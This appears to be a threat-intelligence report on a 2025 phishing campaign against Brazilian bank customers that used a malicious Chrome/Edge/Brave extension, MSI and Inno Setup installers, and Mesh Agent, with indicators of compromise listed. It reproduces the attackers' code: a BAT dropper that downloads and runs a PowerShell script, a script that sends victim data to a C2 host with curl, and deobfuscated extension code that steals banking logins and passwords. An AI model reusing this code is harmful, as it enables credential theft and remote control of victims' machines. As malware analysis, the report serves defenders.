Authors: Klimentiy Galkin, Threat Intelligence Specialist at the Positive Technologies Expert Security Center

• A malicious campaign discovered by Positive Technologies specialists is primarily targeting residents of Brazil. Attacks have been detected since the beginning of 2025.
• Some of the phishing emails were sent from the servers of compromised companies, increasing the chances of a successful attack.
• The attackers used a malicious extension for Google Chrome, Microsoft Edge, and Brave browsers, as well as Mesh Agent and PDQ Connect Agent.
• The total number of the malicious extension downloads has exceeded 700. Among the victims, in addition to users from Brazil, were companies from Colombia, Czech Republic, Mexico, Russia, Vietnam, and other countries.

At the beginning of 2025, threat intelligence specialists of the Positive Technologies Security Expert Center discovered a malicious email offering to download a file from a suspicious website. The identified attack chain leads to the installation of a malicious extension for the Google Chrome browser, targeting users in Brazil. 

During the investigation, files were found in an open directory belonging to the attackers. This allowed us to identify another variation of the attack involving Mesh Agent or PDQ Connect Agent instead of a malicious browser extension. There were also auxiliary scripts containing links with parameters that included the EnigmaCyberSecurity identifier, which is how the campaign got its name.

In the initial version of the attack chain, phishing emails disguised as invoices are used to distribute malware. These emails encourage recipients to download a file from the provided link or open a malicious attachment contained within an archive.

At this stage, several file formats may be used, which will be discussed further.

The contents of the BAT script are listed below. Its main task is to download and execute a malicious PowerShell script.

@echo off
:: Verifica se o script está sendo executado como administrador
net session >nul 2>&1
if %errorLevel% neq 0 (
    :: Se não for administrador, solicita elevação
    powershell -Command "Start-Process '%~f0' -Verb RunAs"
    exit
)

:: Baixar e instalar o PowerShell, se necessário
powershell -NoProfile -ExecutionPolicy Bypass -Command "if (-not (Get-Command powershell -ErrorAction SilentlyContinue)) { Write-Output 'Instalando o PowerShell...'; Install-PackageProvider -Name NuGet -Force; Install-Module -Name PowerShellGet -Force; Install-Module -Name PSReadline -Force }"

:: Baixar o arquivo PS1
powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://enota.clientepj.com/cliente.ps1' -OutFile '%TEMP%\cliente.ps1'"

:: Executar o arquivo PS1 de forma silenciosa
powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "%TEMP%\cliente.ps1"

Fragment of the executed PowerShell script:

Add-Type -AssemblyName System.Windows.Forms

# Verifica se já está em execução, não deixa executar 2x.
$currentProcess = Get-Process -Id $PID
$runningProcesses = Get-Process -Name "powershell" -ErrorAction SilentlyContinue | 
    Where-Object {
        $_.Id -ne $PID -and 
        $_.MainModule.FileName -eq $currentProcess.MainModule.FileName
    }

if ($runningProcesses) {
    # Exibe MessageBox em vez de Write-Host
    [System.Windows.Forms.MessageBox]::Show(
        "Já existe uma instância deste script em execução.", 
        "Script em Execução", 
        [System.Windows.Forms.MessageBoxButtons]::OK, 
        [System.Windows.Forms.MessageBoxIcon]::Warning
    )
    exit 1
}

# Função para não deixar executar o script em VM
function Test-RunningInVM {
    # REDACTED
}

if (Test-RunningInVM) {
    exit 1
}

#############################################################################
# Configuraçao do Script - Alterar se necessário
$serverIP = "142.54.185.178"
$serverPort = 5555

$textServerIP = "142.54.185.178"
$textServerPort = 5556

$computerName = $env:COMPUTERNAME
$nomeps1 = "cliente.ps1"
$nomebat = "cliente.bat"
$nomeextensao = "nplfchpahihleeejpjmodggckakhglee"
$linkexetensao = "nplfchpahihleeejpjmodggckakhglee;https://clients2.google.com/service/update2/crx"
$diretorioExtensoes = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions\$nomeextensao"
#############################################################################
# ...

The functionality of the PowerShell script includes:

• Checking for virtualization
• Checking for Warsaw Technology. This service is developed by GAS Tecnologia along with GBPlugin to protect banking transactions in Brazilian banks. Therefore, the attack mainly targets users in Brazil.
• As part of the persistence mechanism, a registry value named 'PWSecurity' is created under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, pointing to the BAT script previously relocated to the %APPDATA% directory (see Figure 3)..

• Disabling UAC by setting the registry value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA.
• Connecting to C2 142.54.185.178, receiving and processing commands (Figure 4).

The main section of the script processes commands from the server in an infinite loop. The list of commands and their descriptions is provided below:

The MSI file is used by attackers to deliver and install the malicious extension for three browsers: Microsoft Edge, Google Chrome, and Brave. The execution sequence within the installer is shown in Figure 5. It includes two main actions: viewer.exe and LaunchExeWithDirectory.

First, unificado.bat is launched with the following command: /EnforcedRunAsAdmin /HideWindow "[#unificado.bat]". The unificado.bat file looks as follows:

@echo off
chcp 65001 >nul

:: Captura Data/Hora
for /f "tokens=2 delims==" %%a in ('wmic os get localdatetime /value') do set DATETIME=%%a
set "DATA_HORA=%DATETIME:~0,4%-%DATETIME:~4,2%-%DATETIME:~6,2% %DATETIME:~8,2%:%DATETIME:~10,2%:%DATETIME:~12,2%"

:: Consulta API ipinfo.io diretamente via PowerShell (100% funcional)
for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).ip"') do set "IP_PUBLICO=%%a"
for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).hostname"') do set "HOST_INTERNET=%%a"
for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).city"') do set "CIDADE=%%a"
for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).region"') do set "UF=%%a"
for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).country"') do set "PAIS=%%a"

:: Define device padrão
set "DEVICE=Computador"

:: Verifica Warsaw rodando
sc query "Warsaw Technology" | find "RUNNING" >nul
if %errorlevel%==0 (
    set "WARSAW_STATUS=Warsaw Existente"
    set "STATUS=LIBERADO"
) else (
    set "WARSAW_STATUS=Warsaw Inexistente"
    set "STATUS=BLOQUEADO (Warsaw ausente)"
)

:: Envia ao contador (válido para ambas situações)
curl -G "https://enota.clientepj.com/sapinho/contador.php" ^
    --data-urlencode "data=%DATA_HORA%" ^
    --data-urlencode "ip=%IP_PUBLICO%" ^
    --data-urlencode "host=%HOST_INTERNET%" ^
    --data-urlencode "pais=%PAIS%" ^
    --data-urlencode "uf=%UF%" ^
    --data-urlencode "cidade=%CIDADE%" ^
    --data-urlencode "device=Computador" ^
    --data-urlencode "warsaw=%WARSAW_STATUS%" ^
    --data-urlencode "status=%STATUS%" ^
    --silent --output nul

:: Se Warsaw não existir, bloqueia a instalação automaticamente
if "%WARSAW_STATUS%"=="Warsaw Inexistente" (
    echo O Warsaw nao esta rodando! Instalacao cancelada.
    exit /b 1
)

exit /b 0

The script collects basic information about the victim's system and sends it to the C2 server enota.clientepj.com with the following parameters:

• Date and time
• Public IP address
• Hostname
• Location
• Information about the presence of Warsaw Technology
• Status dependent on service availability

As you can see, further work requires Warsaw Technology. If this service exists in the victim's system, the script completes successfully and the next steps are initiated.

The LaunchExeWithDirectory event executes obfuscated JavaScript code from the event.js file. The file can be found inside the installer (Figure 7). The fragment of JavaScript code after deobfuscation is shown below:

// ...
function killBrowsers() {
  var ajeya = new ActiveXObject("WScript.Shell");
  var kalee = ["taskkill /F /IM chrome.exe", "taskkill /F /IM msedge.exe", "taskkill /F /IM brave.exe"];
  for (var chadley = 0; chadley < kalee.length; chadley++) {
    try {
      ajeya.Run(kalee[chadley], 0, true);
    } catch (kalika) {}
  }
}
function getUserDirectories() {
  var novareign = [];
  if (fso.FolderExists("C:\\Users")) {
    var jarran = fso.GetFolder("C:\\Users");
    var carmenlita = new Enumerator(jarran.SubFolders);
    for (; !carmenlita.atEnd(); carmenlita.moveNext()) {
      novareign.push(carmenlita.item().Path);
    }
  } else {}
  return novareign;
}
var userDirectories = getUserDirectories();
for (var i = 0; i < userDirectories.length; i++) {
  var desktopPath = userDirectories[i] + "\\Desktop";
  var desktopPath2 = userDirectories[i] + "\\OneDrive\\Área de trabalho";
  var startMenuPath = userDirectories[i] + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs";
  var quickLaunchPath = userDirectories[i] + "\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch";
  processShortcuts(desktopPath);
  processShortcuts(desktopPath2);
  processShortcuts("C:\\programdata\\Microsoft\\Windows\\Start Menu\\Programs");
  processShortcuts(startMenuPath);
  processShortcuts(quickLaunchPath);
}
deletarArquivo("c:\\programdata\\event.js");
deletarArquivo("c:\\programdata\\aplicativo.msi");
function alterarStringNoArquivo(jaylynn, demetras) {
  var semaya = new ActiveXObject("Scripting.FileSystemObject");
  try {
    var jacquette = semaya.OpenTextFile("C:\\programdata\\microsoft\\TIMEDATE\\cs.js", 1);
// ...

The algorithm of this Powershell script differs from the previously analyzed one in the following ways:

• No need to install the extension from the Chrome Web Store, as it is already located next to the .js file.
• Persistence is gained by searching for and modifying LNK files pointing to browsers in user folders. The--load-extension=<extension-path> parameter is added to them, where extension-path is the path to the extension's source code specified within the script. In this case: C:\programdata\microsoft\TIMEDATE\.

Unlike MSI, the Inno Setup installer runs a PowerShell script described above in the section about the BAT file:

The extension consists of several .js files and a manifest file (Figure 9). The main code is located in the file run-back.js, while cs.js is injected into specific pages after they load, as seen in the manifest. The URL patterns in the manifest and script code indicate that they belong to Banco do Brasil.

First, let's examine run-back.js, which appears as follows after deobfuscation:

let e = '';
let t = '';
let a = '';
let o = '';
function r(_0x1fa244, _0x30450a) {
  chrome.storage.sync.get("eindeutigeKennung", function (_0x5cc065) {
    a = _0x5cc065.eindeutigeKennung;
    var _0x5cc065 = "https://financial-executive.com/comando_temporario.php?eindeutigeKennung=" + a + "&k=" + _0x1fa244.identificacaoUsuario;
    var _0x10f258 = {
      'method': _0x30450a,
      'headers': {
        'Content-Type': "application/json"
      },
      'body': JSON.stringify(_0x1fa244)
    };
    fetch(_0x5cc065, _0x10f258);
  });
}

// ...

When the extension is installed, the value eindeutigeKennung (German for unique identifier) is placed in the code storage. The value is calculated as shown below:

The code contains callback functions triggered by the events onBeforeSendHeaders, onBeforeRequest, and onMessage. To interact with the C2 server, the attackers wrote several auxiliary functions. The function r(requestBody, requestMethod) whose code is provided above sends data to the server by including the unique identifier eindeutigeKennung in one of the parameters. The collected information is shown below:

Below is an example of code that sends information containing user data:

chrome.webRequest.onBeforeRequest.addListener(function (request) {
  let parsedUrl = new URL(request.url);
  if ('POST' === request.method && parsedUrl.pathname.includes("/login")) {
    let loginData = (b = request.requestBody) && b.raw ? JSON.parse(decodeURIComponent(String.fromCharCode.apply(null, new Uint8Array(b.raw[0].bytes)))) : {};
    if (loginData && loginData.identificacaoUsuario) {
      savedLoginData = JSON.stringify(loginData);
      interval = setInterval(s, 2000);
    }
  } else {
    if ('POST' === request.method && parsedUrl.pathname.includes("/armazenar-senha-conta")) {
      let reqBodyObject = (b = request.requestBody) && b.raw ? JSON.parse(decodeURIComponent(String.fromCharCode.apply(null, new Uint8Array(b.raw[0].bytes)))) : {};
      let reqHeadersObj;
      if (reqBodyObject && reqBodyObject.senhaContaSelecaoInputV1) {
        reqHeadersObj = request.requestHeaders;
        r({
          ...JSON.parse(savedLoginData),
          'senha8': reqBodyObject.senhaContaSelecaoInputV1.senhaContaSelecao,
          'tokenHeaderDaten': reqHeadersObj
        }, "PATCH");
      }
    }
  }
}, {
  'urls': ['<all_urls>']
}, ["requestBody"]);

Another function s() is used to receive and process commands from the attackers' server. It is called by the onBeforeRequest and onMessage events:

chrome.runtime.onMessage.addListener((_message, _sender, _sendResponse) => {
  var _messageData;
  if ("login" === _message.type) {
    savedLoginData = JSON.stringify(_message.data);
    interval = setInterval(s, 2000);
  } else if ("store-password" === _message.type) {
    _messageData = _message.data;
    _message = _message.headers;
    r({
      ...JSON.parse(savedLoginData),
      'senha8': _messageData.senhaContaSelecaoInputV1.senhaContaSelecao,
      'tokenHeaderDaten': _message
    }, 'PATCH');
  }
});

The function s() is shown below:

async function s() {
  chrome.tabs.query({
    'active': true,
    'currentWindow': true
  }, function (_activeTabs) {
    if (_activeTabs[0] && _activeTabs[0].url.includes('apf-apj-')) {
      q = JSON.parse(savedLoginData);
      fetch("https://financial-executive.com/comando_temporario.php?eindeutigeKennung=" + a + "&k=" + q.identificacaoUsuario).then(_response => _response.json()).then(function (_responseObject) {
        if (_responseObject.comando && o != _responseObject.comando) {
          let _messageData = {};
          if ("CODE_ZUM_LESEN" === _responseObject.comando) {
            bildadresse = _responseObject.qr;
            _messageData = {
              'befehlstyp': "codeZumLesen",
              'bildadresse': bildadresse
            };
          } else if ("WARTEN" === _responseObject.comando) {
            _messageData = {
              'befehlstyp': "warten"
            };
          } else if ("SCHLIEBEN_WARTEN" === _responseObject.comando) {
            _messageData = {
              'befehlstyp': "schliebenWarten"
            };
          }
          chrome.tabs.sendMessage(_activeTabs[0].id, _messageData);
          o = _responseObject.comando;
        }
      });
    }
  });
}

This function interacts with cs.js (shown below):

The code of the files cs.js and s() indicates that their development is incomplete, but their potential functionality is clear. If the active tab's link contains the substring apf-apj- used in the API of Banco do Brasil, the function s() sends a request to the attackers' server at https://financial-executive.com/comando_temporario.php to receive a new command.

The attacker collects confidential user information used for authentication in a specific service (presumably Banco do Brasil). An interesting feature of the code is the use of German or Portuguese for variable names. This could indicate the attacker's location or suggest that the stealer's code was borrowed rather than written from scratch.

Alongside the attack via a browser extension, an attack using Mesh Agent malware was discovered.

The malware is distributed using the same method: a phishing email about an invoice containing an MSI file. After successful installation, the agent runs and connects to the server via the link wss://mesh.computadorpj.com/agent.ashx and https://mesh.computadorpj.com/. In addition to Mesh Agent, several samples of PDQ Connect Agent installers were found on the attackers' servers.

The RAT attack enables attackers to spread across the infected infrastructure, whereas the malicious extension attack targets only a single user device. One of the consequences of the attack for companies will be described in the section Victims.

The study identified several malicious domains and attacker servers. Thanks to a detailed study of the TLS certificates and other artifacts from the two attack chains, several network indicators were identified:

• *.computadorpj.com
• financial-executive.com
• 142.54.185.178
• clientepj.com
• ranchocentral.com

The domain computadorpj.com shares a TLS certificate with the domain nfe-fiscal.com. Both domains were located at the IP address 107.174.231.26 of the autonomous system (AS-COLOCROSSING). 

Other subdomains were partially located at the IP address 142.54.185.178 used in a PowerShell script to send commands to the victim's system.

The infrastructure can be expanded by analyzing the metadata of malicious installers (Figure 15). Searching open sources, including public sandboxes, helped identify additional network indicators for investigation, such as GitHub repositories.

The new network indicators obtained from ITW links of detected samples with similar metadata (Figure 10) are as follows:

• 18.231.162.77
• https://github.com/contaaws20251
• hamrah-tejarat.com
• servidor2025.com
• atual2025.com
• syarousi-search.com

The PowerShell scripts used to install the extension on the victim's system specify the identifier from the Chrome Web Store. The detected extension identifiers are as follows:

• nplfchpahihleeejpjmodggckakhglee
• ckkjdiimhlanonhceggkfjlmjnenpmfm
• lkpiodmpjdhhhkdhdbnncigggodgdfli

These extensions have already been removed from the store as malicious, but the change history of some of the created extensions is still available.

As mentioned earlier, the analyzed malicious campaign utilizes two attack chains: one involving a malicious extension targeting users in Brazil, and another using Mesh Agent. The second attack enables attackers to spread across the infrastructures of infected companies.

It was possible to identify the compromised organizations and one of the infection targets using data in the attackers' open directory. In the file https://enota.clientepj.com/uploads/resultados.txt, links of the type http://<victim-domain>/about.php?key=EnigmaCyberSecurity were listed. Some of the links still show activity (Figure 17, certain fields are blurred for privacy). The name of the bottommost text field translates to English as Enter the victim's email address below. Multiple email addresses can be entered at once. The source code of this page is also available in the attackers' open directory.

Therefore, the attackers require the servers of the compromised companies to send emails for infecting users in Brazil with a malicious extension.

A total of 70 unique victim companies were identified based on the links. The extension was downloaded 722 times from the Chrome Web Store. However, some of these downloads were performed by sandboxes. The geographical distribution of the victims is shown in the figure below:

The study highlights the use of rather unique techniques in Latin America, including a malicious browser extension and distribution via Windows Installer and Inno Setup installers. To increase the versatility of their attacks and maximize the number of potential victims, the attackers used two attack chains: one involving an extension and the other using Mesh Agent or other RATs.

Files in the attackers' open directory indicate that infecting companies was necessary for discreetly distributing emails on their behalf. However, the main focus of the attacks remained on regular Brazilian users. The attackers' goal is to steal authentication data from the victims' bank accounts. We will continue monitoring this malicious activity and will promptly notify you of any new large-scale attacks.